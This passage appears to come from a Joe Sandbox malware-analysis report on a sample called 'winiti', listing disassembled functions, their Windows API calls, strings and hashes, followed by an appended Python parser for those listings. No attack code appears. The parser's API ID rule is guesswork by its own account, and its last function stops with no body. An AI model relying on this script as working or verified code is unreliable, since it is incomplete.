FlushProcessWriteBuffers 16657->16658 16663 13fdd51d0 16658->16663 16659 13fdd52a3 16659->16617 16668 13fddae00 EventEnabled 16659->16668 16660 13fdd5209 16660->16663 16669 13fdd5ea0 16660->16669 16661 13fdd523e SwitchToThread 16661->16663 16663->16659 16663->16660 16663->16661 16664->16612 16666 13fe38fb0 8 API calls 16665->16666 16667 13fdda6fa 16666->16667 16667->16613 16668->16617 16670 13fdd5ec7 16669->16670 16671 13fdd5ea7 16669->16671 16670->16660 16671->16670 16672 
13fddaf4e 16671->16672 16673 13fddaf22 LoadLibraryExW GetProcAddress 16671->16673 16674 13fddafaa SuspendThread 16672->16674 16675 13fddaff8 16672->16675 16681 13fddaf94 GetLastError 16672->16681 16673->16672 16674->16675 16676 13fddafb8 GetThreadContext 16674->16676 16678 13fe38fb0 8 API calls 16675->16678 16677 13fddafef ResumeThread 16676->16677 16680 13fddafd2 16676->16680 16677->16675 16679 13fddb008 16678->16679 16679->16660 16680->16677 16681->16675 16682 13fddaf9f 16681->16682 16682->16674 16683->16650 16685 13fe38fb0 8 API calls 16684->16685 16686 13fdda689 16685->16686 16686->16652 16687->16653

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                  • String ID:
                  • API String ID: 580471860-0
                  • Opcode ID: 19b53f92ddd9a9a7ef10cbccfe69bfe921807fcdb46f8766bab15c0bbd7aa85f
                  • Instruction ID: 736eec757c262ce87b684346fe93b305bdddd0c65ba92849bd5943a59a976299
                  • Opcode Fuzzy Hash: 19b53f92ddd9a9a7ef10cbccfe69bfe921807fcdb46f8766bab15c0bbd7aa85f
                  • Instruction Fuzzy Hash: 3551E132E04B4486EB52DF6AE8843DA77A1F769BC1F840039EE4D87364EB38C606C700

                  Control-flow Graph

                  APIs
                    • Part of subcall function 000000013FDDB020: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,000000013FDD576B), ref: 000000013FDDB02B
                    • Part of subcall function 000000013FDDB020: QueryInformationJobObject.KERNEL32 ref: 000000013FDDB0FE
                    • Part of subcall function 000000013FDDAEC0: GetModuleHandleExW.KERNEL32(?,?,?,?,000000013FDD3819), ref: 000000013FDDAED1
                  • RtlAddVectoredExceptionHandler.NTDLL ref: 000000013FDD57D8
                    • Part of subcall function 000000013FDDD7B0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013FDDD8AD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: AllocExceptionHandleHandlerInformationModuleObjectQueryVectored_wcsicmp
                  • String ID: StressLogLevel$TotalStressLogSize
                  • API String ID: 2876344857-4058818204
                  • Opcode ID: b8dcc97092589a3276693584986118e267024c8b20105f4c83ed43bccf9c10d3
                  • Instruction ID: 6fcc762c9220a6e87cff8b587366660e67260a395e6df9b0e9ad30481eba0372
                  • Opcode Fuzzy Hash: b8dcc97092589a3276693584986118e267024c8b20105f4c83ed43bccf9c10d3
                  • Instruction Fuzzy Hash: F441AF32E1074082FA51AFA1E4097D973A1EF85788F485029FE49177EADB74CB4BC780

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                  • String ID: @$@$@
                  • API String ID: 2645093340-1177533131
                  • Opcode ID: ca88b2e47b65645c36c042b4dc4072e1c75f948b70b361a8b6e96ed663280510
                  • Instruction ID: e492ddee73dbb625dfe29c123d39e53e25c698c0fd73a6e7a5611deaf27ba14d
                  • Opcode Fuzzy Hash: ca88b2e47b65645c36c042b4dc4072e1c75f948b70b361a8b6e96ed663280510
                  • Instruction Fuzzy Hash: CB512C32B09AC085EB719F55E5443DAB3A0F798B90F44423ADA9D53B98DF7CC54A8B00

                  Control-flow Graph

                  APIs
                  • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,000000013FDD576B), ref: 000000013FDDB02B
                    • Part of subcall function 000000013FDE26B0: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,000000013FDDB04A), ref: 000000013FDE26BF
                    • Part of subcall function 000000013FDE26B0: GetNumaHighestNodeNumber.KERNEL32 ref: 000000013FDE26FD
                    • Part of subcall function 000000013FDE26B0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,000000013FDDB04A), ref: 000000013FDE2729
                    • Part of subcall function 000000013FDE26B0: GetProcessGroupAffinity.KERNEL32 ref: 000000013FDE273A
                    • Part of subcall function 000000013FDE26B0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,000000013FDDB04A), ref: 000000013FDE2749
                    • Part of subcall function 000000013FDDD7B0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013FDDD8AD
                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,000000013FDD576B), ref: 000000013FDDB09A
                  • GetProcessAffinityMask.KERNEL32 ref: 000000013FDDB0AD
                  • QueryInformationJobObject.KERNEL32 ref: 000000013FDDB0FE
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
                  • String ID: PROCESSOR_COUNT
                  • API String ID: 296690692-4048346908
                  • Opcode ID: f854a702a83dc01c41646339c6b0099762c4a12ee8e6a0d15d954c5e394c61ba
                  • Instruction ID: 3de7096c5d51fc5c69007337340e52b751dda9deaf237b9e6cc63cd3557821f4
                  • Opcode Fuzzy Hash: f854a702a83dc01c41646339c6b0099762c4a12ee8e6a0d15d954c5e394c61ba
                  • Instruction Fuzzy Hash: 5F31C332A0464186EB249F90D8883ED63A5FB8579CF84013DE799477E5DB38CA0BD750

                  Control-flow Graph

                  APIs
                  Strings
                  • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 000000013FDD6726
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastRaise$Sleep
                  • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                  • API String ID: 3706814929-926682358
                  • Opcode ID: 748c09927475cf9e349a911d070e2e85ba1b369a78d20386409e9d4058d69fe5
                  • Instruction ID: 58798879c27453f5b5af52b0f429a81c2e6c07b07933697c4022721058f4657d
                  • Opcode Fuzzy Hash: 748c09927475cf9e349a911d070e2e85ba1b369a78d20386409e9d4058d69fe5
                  • Instruction Fuzzy Hash: E6416132615B4486EBA2EF6AE4587DA33E0FB08B84F04413EEA49437E5DF39C552C780

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Thread$CloseCreateHandlePriorityResume
                  • String ID:
                  • API String ID: 3633986771-0
                  • Opcode ID: 43130a00a2952a497caba751cbab80e0c5945ae47426b9584871a3a1cc0fd745
                  • Instruction ID: 51d9b90f2f0cb4bead726826c3fc5e248c1d0c8a523f80c937f40abb293b820f
                  • Opcode Fuzzy Hash: 43130a00a2952a497caba751cbab80e0c5945ae47426b9584871a3a1cc0fd745
                  • Instruction Fuzzy Hash: 5AE012B6F1170582FB159F72B8193A55354BB98BA5F484438DE4A173A0EF3CC2978644

                  Control-flow Graph

                  • Control-flow graph (rendered image) for function 13fde2080-13fde225b: calls GetCurrentProcess, GlobalMemoryStatusEx and the subroutines 13fe38be5 and 13fe38fb0
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CurrentGlobalMemoryProcessStatus
                  • String ID: @
                  • API String ID: 3261791682-2766056989
                  • Opcode ID: 9126c160c7f3f8a979c28d89de266492a2cb26c761d1c6b8a32731156d037bec
                  • Instruction ID: 6cbde7d94e6c0cf4b3a80eb2cb1af277c1c132f4f69480687a0e135cf7c325ad
                  • Opcode Fuzzy Hash: 9126c160c7f3f8a979c28d89de266492a2cb26c761d1c6b8a32731156d037bec
                  • Instruction Fuzzy Hash: C8412672F01B4541F956CF7692183A99252BB69BC1F18C739AE0E77744FB39C7938600

                  Control-flow Graph

                  • Control-flow graph (rendered image) for function 13fe01660-13fe01833: calls EnterCriticalSection, LeaveCriticalSection and the subroutines 13fdfe7a0 and 13fde2930
                  APIs
                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,000000013FDED516,?,-8000000000000000,00000001,000000013FDFC6D6), ref: 000000013FE016EA
                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,000000013FDED516,?,-8000000000000000,00000001,000000013FDFC6D6), ref: 000000013FE01759
                  • EnterCriticalSection.KERNEL32(?,?,?,?,00000000,000000013FDED516,?,-8000000000000000,00000001,000000013FDFC6D6), ref: 000000013FE017A2
                  • LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,000000013FDED516,?,-8000000000000000,00000001,000000013FDFC6D6), ref: 000000013FE017B8
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 0430e5036a9640feed12229f19debff97727073d71a72808b7631fa93863536e
                  • Instruction ID: f3bffc438486ad61274dee272708329de89d6a11b24b158af4155c7c795729ac
                  • Opcode Fuzzy Hash: 0430e5036a9640feed12229f19debff97727073d71a72808b7631fa93863536e
                  • Instruction Fuzzy Hash: 51514F35A08A4181EA26CF52FC943E973A0F75A7D4F59423AEA5D47AB5CB3CC756C300

                  Control-flow Graph

                   • Graph summary: 23 basic blocks from 13fe104d0 to 13fe10625; EnterCriticalSection at 13fe10509 and 13fe105d7, LeaveCriticalSection at 13fe1057f and 13fe105fd; one internal call to 13fde2930 at 13fe105b2.
                  APIs
                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,000000013FDFDA29), ref: 000000013FE10510
                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,000000013FDFDA29), ref: 000000013FE10586
                  • EnterCriticalSection.KERNEL32(?,00000000,00000001,000000013FDFDA29), ref: 000000013FE105DE
                  • LeaveCriticalSection.KERNEL32(?,00000000,00000001,000000013FDFDA29), ref: 000000013FE10604
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: CriticalSection$EnterLeave
                  • String ID:
                  • API String ID: 3168844106-0
                  • Opcode ID: 49907da951615bb056f4715dd605aad2ff44e51d4236cc1df112cb9915273893
                  • Instruction ID: c43f0dbb90059c57102601ee3645260c84d75fa9400f2f86668015cf3d8ca442
                  • Opcode Fuzzy Hash: 49907da951615bb056f4715dd605aad2ff44e51d4236cc1df112cb9915273893
                  • Instruction Fuzzy Hash: 4A415D71A08A5491FA23DF13E8843EA73A4F76A7C1F860539EB49476B5DB7CC682C310

                  Control-flow Graph

                   • Graph summary: function at 13fdecf30, basic blocks up to 13fded1fd; SwitchToThread at 13fded008, 13fded019 and 13fded045; internal calls to 13fdd96d0, 13fdd9750, 13fde28e0, 13fdedbe0, 13fded660, 13fdf3670, 13fe04b90, 13fe0e2b0, 13fe106c0 and 13fe10880.
                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: SwitchThread
                  • String ID:
                  • API String ID: 115865932-0
                  • Opcode ID: b53c1b8baf3fa961f42f9a93c026e3a91cc4469665a52e1080013d420c1a925c
                  • Instruction ID: eef52e2a6ef1e40c188b4447e1643330802c6adf8eb01af30b5675ce26e5ea4e
                  • Opcode Fuzzy Hash: b53c1b8baf3fa961f42f9a93c026e3a91cc4469665a52e1080013d420c1a925c
                  • Instruction Fuzzy Hash: CB71D231B0020286FB66AF96E9497EA2391BB647D4F04013DFE19972E9DF39CA43D700

                  Control-flow Graph

                  APIs
                  • VirtualAlloc.KERNELBASE(?,?,?,?,00000000,000000013FDE5348,?,?,0000000A,000000013FDE43A0,?,?,00000000,000000013FDDEA91), ref: 000000013FDE2957
                  • GetCurrentProcess.KERNEL32(?,?,?,?,00000000,000000013FDE5348,?,?,0000000A,000000013FDE43A0,?,?,00000000,000000013FDDEA91), ref: 000000013FDE2977
                  • VirtualAllocExNuma.KERNEL32 ref: 000000013FDE2998
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: AllocVirtual$CurrentNumaProcess
                  • String ID:
                  • API String ID: 647533253-0
                  • Opcode ID: 686b3994b09b840201f1684b8296069bddec3b68bb7cd25d79b3609eb5cb6e8f
                  • Instruction ID: aa6897ca42bc0b9267c8f05918eb2316bc02c96353b43b00398aee0318a2a711
                  • Opcode Fuzzy Hash: 686b3994b09b840201f1684b8296069bddec3b68bb7cd25d79b3609eb5cb6e8f
                  • Instruction Fuzzy Hash: 8BF06272B14690C2EB208F26F40475AA760BB49FD5F584139EF8C17B58DB3DC6928B04

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: EventRegister
                  • String ID: gcConservative
                  • API String ID: 3840811365-1953527212
                  • Opcode ID: 0bd704104a13a76449dc93aebda2a80e695e757360b9318b75be9f098cee9c4f
                  • Instruction ID: cd7004de79b0c52b3982eadcf4cc4a58fd4ebfabc35e283b2789982290135b85
                  • Opcode Fuzzy Hash: 0bd704104a13a76449dc93aebda2a80e695e757360b9318b75be9f098cee9c4f
                  • Instruction Fuzzy Hash: 6C317E31600B4A92FB12DF9AE985BD633A0FB497C4F40552AFB4D032B2DB39C64AD740

                  Control-flow Graph

                   • Graph summary: 8 basic blocks from 13fe38ed4 to 13fe38f0f; malloc at 13fe38eee, with a back-edge from the call to 13fe406d3 (13fe38edf) into the malloc block; the function leaves through calls to 13fe39a2c (13fe38f04) and 13fe39a4c (13fe38f0a).
                  APIs
                  • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000000013FE38FD9,?,?,?,?,000000013FDDDBC1,?,?,?,000000013FDDE13C,00000000,00000020,?), ref: 000000013FE38EEE
                  • Concurrency::cancel_current_task.LIBCPMT ref: 000000013FE38F04
                    • Part of subcall function 000000013FE39A2C: std::bad_alloc::bad_alloc.LIBCMT ref: 000000013FE39A35
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                   • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmp
                   • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Concurrency::cancel_current_taskmallocstd::bad_alloc::bad_alloc
                  • String ID:
                  • API String ID: 205171174-0
                  • Opcode ID: b0e683634f6cf977cd568e859ab9fb6e1e75df7de34bcf169af656f9c50744c0
                  • Instruction ID: 63dd8b6169fcafdd9835402df0ae5b0004d9e3e27d86b2b299866d146ce1ad37
                  • Opcode Fuzzy Hash: b0e683634f6cf977cd568e859ab9fb6e1e75df7de34bcf169af656f9c50744c0
                  • Instruction Fuzzy Hash: EFE01772E1210A46FD2866775E6E3E900818F48370E2F1B7E5D36086F3AA248B9B8210
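The "APIs" lists in these entries share one fixed line shape, and the "API ID" under "Similarity" is a normalised key derived from them. The Python below is added here as an example; it is not code from the Joe Sandbox report or its IDA plugin. It parses the API lines into records and rebuilds the API ID so that functions can be grouped or compared across reports. The sample text is constructed from the EnterCriticalSection, VirtualAllocExNuma and malloc entries on this page (argument lists shortened); the "APIs" / "Memory Dump Source" delimiters follow the page layout; the API ID rule (CamelCase split, the particles Get/Ex/To dropped, words grouped by descending frequency, groups joined with "$") is inferred from the IDs printed on this page and is an assumption beyond those entries.

```python
from __future__ import annotations

import re
from collections import Counter
from dataclasses import dataclass, field

# Constructed sample: "APIs" entries from three functions in this report, in the
# line shape Joe Sandbox prints them (argument lists cut short).
SAMPLE_REPORT = """\
APIs
• EnterCriticalSection.KERNEL32(?,?,?,?,00000000,000000013FDED516), ref: 000000013FE016EA
• LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,000000013FDED516), ref: 000000013FE01759
• EnterCriticalSection.KERNEL32(?,?,?,?,00000000,000000013FDED516), ref: 000000013FE017A2
• LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,000000013FDED516), ref: 000000013FE017B8
Memory Dump Source
APIs
• VirtualAlloc.KERNELBASE(?,?,?,?,00000000,000000013FDE5348), ref: 000000013FDE2957
• GetCurrentProcess.KERNEL32(?,?,?,?,00000000,000000013FDE5348), ref: 000000013FDE2977
• VirtualAllocExNuma.KERNEL32 ref: 000000013FDE2998
Memory Dump Source
APIs
• malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,000000013FE38FD9), ref: 000000013FE38EEE
• Concurrency::cancel_current_task.LIBCPMT ref: 000000013FE38F04
  • Part of subcall function 000000013FE39A2C: std::bad_alloc::bad_alloc.LIBCMT ref: 000000013FE39A35
Memory Dump Source
"""

# One "• Name.MODULE(args), ref: ADDR" line. "Part of subcall function X:" marks a
# call the plugin attributes to a callee rather than to the function itself.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[^.(\s]+)\.(?P<module>[A-Za-z0-9_\-]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)

# Assumption: the report's "API ID" omits these particles from CamelCase names;
# inferred from the IDs on this page (VirtualAllocExNuma, GetCurrentProcess, SwitchToThread).
STOP_WORDS = {"Get", "Ex", "To"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: tuple[str, ...]
    ref: int                    # address of the call site
    subcall_of: int | None = None   # callee the call was attributed to, if any


@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)

    @property
    def names(self) -> list[str]:
        return [c.name for c in self.calls]

    @property
    def api_id(self) -> str:
        return api_id(self.names)


def api_words(name: str) -> list[str]:
    """Split a CamelCase Win32 name into words; keep CRT/C++ names whole."""
    if re.fullmatch(r"[A-Za-z0-9]+", name) and name[0].isupper():
        return [w for w in re.findall(r"[A-Z][a-z0-9]*", name) if w not in STOP_WORDS]
    return [name]


def api_id(names: list[str]) -> str:
    """Words grouped by descending frequency, sorted inside a group, groups joined by '$'."""
    counts = Counter(w for n in names for w in api_words(n))
    by_count: dict[int, list[str]] = {}
    for word, n in counts.items():
        by_count.setdefault(n, []).append(word)
    return "$".join("".join(sorted(by_count[n])) for n in sorted(by_count, reverse=True))


def parse_report(text: str) -> list[FunctionRecord]:
    """Collect the calls listed between each "APIs" heading and "Memory Dump Source"."""
    records: list[FunctionRecord] = []
    current: FunctionRecord | None = None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        if stripped == "Memory Dump Source":
            current = None
            continue
        m = API_LINE.match(line)
        if m is None or current is None:
            continue
        args = tuple(a for a in (m["args"] or "").split(",") if a)
        current.calls.append(ApiCall(
            name=m["name"], module=m["module"], args=args, ref=int(m["ref"], 16),
            subcall_of=int(m["sub"], 16) if m["sub"] else None))
    return records


def find_callers(records: list[FunctionRecord], api_name: str) -> list[ApiCall]:
    """Every call site of api_name across the parsed functions."""
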